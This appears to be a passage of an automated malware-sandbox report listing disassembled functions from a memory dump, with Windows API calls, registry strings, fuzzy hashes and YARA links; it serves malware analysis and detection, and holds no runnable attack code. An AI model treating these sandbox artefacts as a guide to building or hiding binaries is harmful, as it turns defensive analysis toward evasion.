Part of subcall function 00404FF4: GetStdHandle.KERNEL32(000000F5,00405080,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5), ref: 00405048
Part of subcall function 00404FF4: WriteFile.KERNEL32(00000000,000000F5,00405080,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5), ref: 0040504E

Strings

P`P, xrefs: 0040508D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: P`P
API String ID: 3490077880-2641087985
Opcode ID: 67745d2a90b6bb3ff316590b602e0cd10b8b3b5cdbec14fdcb65c5cfb318c2aa
Instruction ID: d4573c39f1a0b34f224570e446c2afe9b1c688f2ce670eb66d61aa7b362db06e
Opcode Fuzzy Hash: 67745d2a90b6bb3ff316590b602e0cd10b8b3b5cdbec14fdcb65c5cfb318c2aa
Instruction Fuzzy Hash: 80312D70A00B018BEB31AB76849971F7AE0AF54314F15053FE586AB3D2D77C9884CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004A4BC4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004A4C39
SelectObject.GDI32(?,00000000), ref: 004A4C5C
ReleaseDC.USER32 ref: 004A4C8F

Strings

cMJ, xrefs: 004A4BFE

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectReleaseSelect
String ID: cMJ
API String ID: 1831053106-1712207277
Opcode ID: 6b71cf63299bba1c9cfc14544bc38dc231065f563dac187f4686542547228b00
Instruction ID: 8ca3febb1ab0f4ca3628e4dbf8ad6a543fdc1f83c590c8228c2ae4e78597abcd
Opcode Fuzzy Hash: 6b71cf63299bba1c9cfc14544bc38dc231065f563dac187f4686542547228b00
Instruction Fuzzy Hash: BC21A470E01248EFDB10DFA5C841B9EB3F9EB99314F52846AE404A7282D7B89E00CA59

Uniqueness

Uniqueness Score: -1.00%

Function 004373B0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 004373D6

Part of subcall function 0043736C: GetDC.USER32(00000000), ref: 00437375
Part of subcall function 0043736C: SelectObject.GDI32(00000000,058A00B4), ref: 00437387
Part of subcall function 0043736C: GetTextMetricsW.GDI32(00000000,?,00000000), ref: 00437392
Part of subcall function 0043736C: ReleaseDC.USER32 ref: 004373A3

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 0043742C
MS Shell Dlg 2, xrefs: 00437440
Tahoma, xrefs: 004373F8

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsObjectReleaseSelectText
String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
API String ID: 2013942131-1011973972
Opcode ID: f5915ef49f0666334897a883be5335ad055b9bc3b399126011555a0ca1a3dff7
Instruction ID: e0ae67a72fd2220e59121ca18970ec0978b29c3944d44ea30f011eceb9cb27e6
Opcode Fuzzy Hash: f5915ef49f0666334897a883be5335ad055b9bc3b399126011555a0ca1a3dff7
Instruction Fuzzy Hash: CC11DDB0604208AFD720EF6ADC4295DBBA9EB59300F91946AF88093B91D738AD05CB1C

Uniqueness

Uniqueness Score: -1.00%

Function 004A9DE8, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 004A9DB8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004A9DD0

LoadLibraryW.KERNEL32(00000000,00000000,004A9EB0,?,00000000,00000000,00000000,00000000), ref: 004A9E3F
LoadLibraryW.KERNEL32(00000000,00000000,00000000,004A9EB0,?,00000000,00000000,00000000,00000000), ref: 004A9E85

Strings

MSFTEDIT.DLL, xrefs: 004A9E2C
RICHED20.DLL, xrefs: 004A9E72

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$DirectorySystem
String ID: MSFTEDIT.DLL$RICHED20.DLL
API String ID: 2630572097-3133735514
Opcode ID: dfa4c65e3d936239fe36dfa3fbb332cf940be2b337a184d423423f054646c9da
Instruction ID: a9f132dd17a2b82c4d76cca9c0a579eb9b5eaf10c42bece485a4e9ac59b76b11
Opcode Fuzzy Hash: dfa4c65e3d936239fe36dfa3fbb332cf940be2b337a184d423423f054646c9da
Instruction Fuzzy Hash: E6119070910108DFDB00FFA1D882AAE73B9EB65308F41C97BE500A7693D7786E49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004B0580, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C

RegCloseKey.ADVAPI32(?,004B05EB,?,00000001,00000000), ref: 004B05DE

Strings

SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004B058C
PendingFileRenameOperations, xrefs: 004B05B0
PendingFileRenameOperations2, xrefs: 004B05BF

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-2115312317
Opcode ID: f84d2b44c9a63fb431e5107106fdec81c4387247ee5f9a53936bd64424847bf8
Instruction ID: 804ad6ca0943b894b96feb314c15f8beab6de6e5b0984f264e825367721b0471
Opcode Fuzzy Hash: f84d2b44c9a63fb431e5107106fdec81c4387247ee5f9a53936bd64424847bf8
Instruction Fuzzy Hash: D7F06D712042087BEB14D6A69D12A9BB39CD784725F60886BF54486A81EA79ED019A3C

Uniqueness

Uniqueness Score: -1.00%

Function 0047FD48, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyW.ADVAPI32(?,00000000), ref: 0047FD54
GetModuleHandleW.KERNEL32(advapi32.dll,RegDeleteKeyExW,?,00000000,0047FF3B,00000000,0047FF53,?,?,?), ref: 0047FD6F

Strings

advapi32.dll, xrefs: 0047FD6A
RegDeleteKeyExW, xrefs: 0047FD65

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteHandleModule
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 3550747403-4033151799
Opcode ID: a6a1998f94020afa24a90d1cb7fb1923ecc2cd570b394969cc260e6e368cf805
Instruction ID: aa0877668d079f8a6811237ab7fed581843c075a164a8a8cd73df927e2332a0d
Opcode Fuzzy Hash: a6a1998f94020afa24a90d1cb7fb1923ecc2cd570b394969cc260e6e368cf805
Instruction Fuzzy Hash: E7E06DB06053206EF23467A4AC9ABD7261C8B55315F145437B10AA92E282FC2C4CD6AC

Uniqueness

Uniqueness Score: -1.00%

Function 00460848, Relevance: 6.4, APIs: 4, Instructions: 359COMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 00460CB8

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Capture
String ID:
API String ID: 1145282425-0
Opcode ID: 9ec700b3cb7743530922297284542ed004c7e30c035a30f926527527995ac77b
Instruction ID: 7b86f330580d24c5676f6a5729b9b713e574994b2e37c410721b7974a9053e91
Opcode Fuzzy Hash: 9ec700b3cb7743530922297284542ed004c7e30c035a30f926527527995ac77b
Instruction Fuzzy Hash: B2E12230600204DFDB15DFA8C589BAFB7F5EF05314F2441A6E804AB366E778AE45DB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0040929A, Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59dccebbeff941b803f4f1545372d90d96655e6c7d36ec4641ad473e24abda45
Instruction ID: a4e78150ac00c1b63b191b54dd2790140ecd95c9dc0b79b22cae33201e68362c
Opcode Fuzzy Hash: 59dccebbeff941b803f4f1545372d90d96655e6c7d36ec4641ad473e24abda45
Instruction Fuzzy Hash: 7AC1ABA281D2C59BCB368B6159A42667F40FA6728071809FBE8547BDDBF33D1C09C74E

Uniqueness

Uniqueness Score: -1.00%

Function 0045E480, Relevance: 6.3, APIs: 4, Instructions: 308COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00000000,00000000), ref: 0045E5FF
MulDiv.KERNEL32(?,?,?), ref: 0045E63A

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15b5de875d9476425ee5d1d7a97e60a8c037a1b7bca8de3296af04510af2a251
Instruction ID: 5be1a7d65d3e7bbec65ed8cc02008475eeea24c6e4d026fb2131eb66a9c07e63
Opcode Fuzzy Hash: 15b5de875d9476425ee5d1d7a97e60a8c037a1b7bca8de3296af04510af2a251
Instruction Fuzzy Hash: 12D18B70A00609DFCB15CF69C584AAABBF2FF48301F148A5AE856DB356DB34EE05CB10

Uniqueness

Uniqueness Score: -1.00%

Function 004D1578, Relevance: 6.3, APIs: 4, Instructions: 268fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32(000000FF,?,00000000,004D1761,?,00000000,?,00000000,00000000,004D1934,?,00000000,?,004D1B22,00000000,?), ref: 004D173D
FindClose.KERNEL32(000000FF,004D1768,004D1761,?,00000000,?,00000000,00000000,004D1934,?,00000000,?,004D1B22,00000000,?,00000000), ref: 004D175B
FindNextFileW.KERNEL32(000000FF,?,00000000,004D1864,?,004D1954,?,00000000,00000000,?,00000000,00000000,004D1934,?,00000000), ref: 004D1840
FindClose.KERNEL32(000000FF,004D186B,004D1864,?,004D1954,?,00000000,00000000,?,00000000,00000000,004D1934,?,00000000,?,004D1B22), ref: 004D185E

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 8809533f2528a4804e1ee75cfd3352268b3fa30e384661c4e624b3e2eb7c4814
Instruction ID: 68c8f40092ec977a89a2fbadce96f10d62dc447b216a46c30f5e71780fa125a2
Opcode Fuzzy Hash: 8809533f2528a4804e1ee75cfd3352268b3fa30e384661c4e624b3e2eb7c4814
Instruction Fuzzy Hash: C4C1607490425EAFDF11DF95C895AEEBBB5BF08304F1084ABE818A33A1D7389A55CF14

Uniqueness

Uniqueness Score: -1.00%

Function 004E2074, Relevance: 6.1, APIs: 4, Instructions: 142fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32(000000FF,?,?,00000000,?,00000000,004E2252,?,00000000,00000000,?,?,004E3575,?,?,00000000), ref: 004E2120
FindClose.KERNEL32(000000FF,000000FF,?,?,00000000,?,00000000,004E2252,?,00000000,00000000,?,?,004E3575,?,?), ref: 004E212D
FindNextFileW.KERNEL32(000000FF,?,00000000,004E2225,?,004E2270,00000000,?,?,00000000,?,00000000,004E2252,?,00000000,00000000), ref: 004E2201
FindClose.KERNEL32(000000FF,004E222C,004E2225,?,004E2270,00000000,?,?,00000000,?,00000000,004E2252,?,00000000,00000000), ref: 004E221F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 2b8314bdbceea27102b83af79ede51fa39ffa57f6316832691afec693f4d2ff1
Instruction ID: 36a0e88ed47ed5a5c9c6a220835a55ad9e2fb1171e9217a1a669a0d379b35c3b
Opcode Fuzzy Hash: 2b8314bdbceea27102b83af79ede51fa39ffa57f6316832691afec693f4d2ff1
Instruction Fuzzy Hash: 8D518071904249AFDF11EFA6CD45ADEB7BCEB08304F1045AAE908A3281D6789F45CF14

Uniqueness

Uniqueness Score: -1.00%

Function 004793CC, Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 00479411
GetDC.USER32(00000000), ref: 00479466
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00479470
ReleaseDC.USER32 ref: 0047947B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceKeyboardLayoutRelease
String ID:
API String ID: 3331096196-0
Opcode ID: d5d74c8ca3efa44066210ef010089a58dcc0b90acec5453446a83ae0bd2fe379
Instruction ID: d0959ebf1726b2668cf9b8fb25dc699690e94914cae8e69f49161f1a5ca15aee
Opcode Fuzzy Hash: d5d74c8ca3efa44066210ef010089a58dcc0b90acec5453446a83ae0bd2fe379
Instruction Fuzzy Hash: 3041C4B06012408FD750EF69D8C1B447BE1AB04318F45D1BAE908DF3A3D639AC08CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00443158, Relevance: 6.1, APIs: 4, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000BB,?,00000000), ref: 00443194
SendMessageW.USER32(00000000,000000BB,?,00000000), ref: 004431C3
SendMessageW.USER32(00000000,000000C1,00000000,00000000), ref: 004431DF
SendMessageW.USER32(00000000,000000B1,00000000,00000000), ref: 0044320A

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fef5ed53fd31a327b844ff8843d04730729e65a09a6991a3f5528ed982a67ded
Instruction ID: 4d174a75eacc8a696d77b554faee4562b2c03e2f9e8e69cf2d99b769e5ad33a4
Opcode Fuzzy Hash: fef5ed53fd31a327b844ff8843d04730729e65a09a6991a3f5528ed982a67ded
Instruction Fuzzy Hash: 2521F8703007456BE710EFA6DC82F5BB2ECEB84B05F20487E7441E76C2DAB89E10852D

Uniqueness

Uniqueness Score: -1.00%

Function 0042BDD0, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON

Download Yara Rule

APIs

GetClassInfoW.USER32 ref: 0042BDF1
UnregisterClassW.USER32 ref: 0042BE1A
RegisterClassW.USER32 ref: 0042BE24
SetWindowLongW.USER32 ref: 0042BE6F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 79c0db732e8d308a1803ed9c95c1be72988015461dfd962e98590c7cf2f32bc1
Instruction ID: 44257e4e844b348939103baf6fa14a3357942d68770810eb0762cc7fdd13d0f6
Opcode Fuzzy Hash: 79c0db732e8d308a1803ed9c95c1be72988015461dfd962e98590c7cf2f32bc1
Instruction Fuzzy Hash: CB01A1717445056BCB00EB98EC45FAF33ADE718304F004626FA44E73E1CB7A9C199794

Uniqueness

Uniqueness Score: -1.00%

Function 0047AEC4, Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

EnumWindows.USER32(Function_0007AE10), ref: 0047AEF1
GetWindow.USER32(?,00000003), ref: 0047AF09
GetWindowLongW.USER32(00000000,000000EC), ref: 0047AF16
SetWindowPos.USER32(00000000,000000EC,00000000,00000000,00000000,00000000,00000213,00000000,000000EC,?,00000003,Function_0007AE10), ref: 0047AF55

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnumLongWindows
String ID:
API String ID: 4191631535-0
Opcode ID: dc46f87aefadf03c832279afaf1de0c6b497e464b5d3ad6a3c82fe943312a327
Instruction ID: 2d5f21eb873434450f0e1e4589335b27ae91d818ecc58bf65364ca7c416f6070
